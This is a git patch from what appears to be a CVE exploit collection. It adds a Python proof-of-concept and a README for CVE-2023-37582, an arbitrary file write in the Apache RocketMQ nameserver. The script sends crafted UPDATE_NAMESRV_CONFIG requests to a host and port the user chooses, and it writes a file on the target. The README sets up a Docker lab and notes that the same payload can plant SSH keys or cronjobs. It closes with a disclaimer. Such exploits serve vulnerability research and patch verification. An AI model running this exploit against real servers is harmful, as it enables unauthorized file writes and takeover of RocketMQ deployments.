From 29bd78f73941b39e36d38cd1653433dcf2ce588e Mon Sep 17 00:00:00 2001 From: helloexp <21156949+helloexp@users.noreply.github.com> Date: Tue, 12 Sep 2023 08:57:05 +0800 Subject: [PATCH] add CVE-2023-37582 RocketMQ RCE --- 00-CVE_EXP/CVE-2023-37582/CVE-2023-37582.py | 76 +++++++++++++++++++++ 00-CVE_EXP/CVE-2023-37582/README.md | 50 ++++++++++++++ 2 files changed, 126 insertions(+) create mode 100644 00-CVE_EXP/CVE-2023-37582/CVE-2023-37582.py create mode 100644 00-CVE_EXP/CVE-2023-37582/README.md diff --git a/00-CVE_EXP/CVE-2023-37582/CVE-2023-37582.py b/00-CVE_EXP/CVE-2023-37582/CVE-2023-37582.py new file mode 100644 index 0000000..62513bc --- /dev/null +++ b/00-CVE_EXP/CVE-2023-37582/CVE-2023-37582.py @@ -0,0 +1,76 @@ +import sys +import argparse +import socket +import binascii + + +def exploit(address, port): + try: + client_socket = socket.socket() + client_socket.settimeout(5) # Set socket timeout to 5 seconds + client_socket.connect((address, port)) + + # common/src/main/java/org/apache/rocketmq/common/protocol/RequestCode.java + # public static final int UPDATE_NAMESRV_CONFIG = 318; + header = '{"code":318,"flag":0,"language":"JAVA","opaque":0,"serializeTypeCurrentRPC":"JSON","version":405}'.encode( + 'utf-8') + body = 'configStorePath=/tmp/pwned\nproductEnvName=test/path\\ntest\\ntest'.encode('utf-8') + + header_length = int(len(binascii.hexlify(header).decode('utf-8')) / 2) + header_length_hex = '00000000' + str(hex(header_length))[2:] + total_length = int(4 + len(binascii.hexlify(body).decode('utf-8')) / 2 + header_length) + total_length_hex = '00000000' + str(hex(total_length))[2:] + data = total_length_hex[-8:] + header_length_hex[-8:] + binascii.hexlify(header).decode( + 'utf-8') + binascii.hexlify(body).decode('utf-8') + + client_socket.send(bytes.fromhex(data)) + data_received = client_socket.recv(1024) + print(data_received) + + client_socket.close() + except socket.timeout: + print(f"Connection to {address}:{port} timed out") + + +def get_namesrv_config(address, port): + try: + client_socket = socket.socket() + client_socket.settimeout(5) # Set socket timeout to 5 seconds + client_socket.connect((address, port)) + + # common/src/main/java/org/apache/rocketmq/common/protocol/RequestCode.java + # public static final int GET_NAMESRV_CONFIG = 319; + header = '{"code":319,"flag":0,"language":"JAVA","opaque":0,"serializeTypeCurrentRPC":"JSON","version":405}'.encode( + 'utf-8') + + header_length = int(len(binascii.hexlify(header).decode('utf-8')) / 2) + header_length_hex = '00000000' + str(hex(header_length))[2:] + total_length = int(4 + header_length) + total_length_hex = '00000000' + str(hex(total_length))[2:] + data = total_length_hex[-8:] + header_length_hex[-8:] + binascii.hexlify(header).decode('utf-8') + + client_socket.send(bytes.fromhex(data)) + data_received = client_socket.recv(1024) + print(data_received) + + client_socket.close() + except socket.timeout: + print(f"Connection to {address}:{port} timed out") + + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description='RocketMQ Exploit') + parser.add_argument('-ip', default='127.0.0.1', help='Nameserver address') + parser.add_argument('-p', default=9876, type=int, help='Nameserver listen port') + + if len(sys.argv) == 1: + parser.print_help() + sys.exit(1) + + args = parser.parse_args() + + print('current nameserver config:') + get_namesrv_config(args.ip, args.p) + exploit(args.ip, args.p) + print('modified nameserver config:') + get_namesrv_config(args.ip, args.p) diff --git a/00-CVE_EXP/CVE-2023-37582/README.md b/00-CVE_EXP/CVE-2023-37582/README.md new file mode 100644 index 0000000..a2134ad --- /dev/null +++ b/00-CVE_EXP/CVE-2023-37582/README.md @@ -0,0 +1,50 @@ +# CVE-2023-37582_EXPLOIT +Apache RocketMQ Arbitrary File Write Vulnerability Exploit Demo + +# Overview +In fact, the Arbitrary file write vulnerability(CVE-2023-37582) in Apache RocketMQ has already been addressed in the CVE-2023-33246 RCE vulnerability. +However, the fix provided for [CVE-2023-33246](https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT) RCE is not comprehensive as it only resolves the impact on RocketMQ's broker. +This vulnerability affects RocketMQ's nameserver, and exploiting it allows for arbitrary file write capabilities. + + + + +# Setup local RocketMQ environment via Docker +```bash + +# start name server +docker run -d --name rmqnamesrv -p 9876:9876 apache/rocketmq:4.9.6 sh mqnamesrv + +# start broker +docker run -d --name rmqbroker \ + --link rmqnamesrv:namesrv \ + -e "NAMESRV_ADDR=namesrv:9876" \ + -p 10909:10909 \ + -p 10911:10911 \ + -p 10912:10912 \ + apache/rocketmq:4.9.6 sh mqbroker \ + -c /home/rocketmq/rocketmq-4.9.6/conf/broker.conf + +``` + +# Exploit + +It is important to note that the exploit provided is for demonstration purposes only. +The current exploit allows for the writing of a file to the nameserver's `/tmp/pwned` directory. +Modifying the content of the `body` variable allows for the exploitation of this vulnerability by writing an OpenSSH private key or adding a cronjob. +However, it is crucial to remember that such activities are unauthorized and can lead to serious security breaches. +It is strongly advised to refrain from engaging in any malicious activities and to prioritize responsible and ethical cybersecurity practices. + +``` +usage: CVE-2023-37582.py [-h] [-ip IP] [-p P] + +RocketMQ Exploit + +optional arguments: + -h, --help show this help message and exit + -ip IP Nameserver address + -p P Nameserver listen port +``` + +# References +[RocketMQ commit: Fix incorrect naming](https://github.com/apache/rocketmq/pull/6843/files)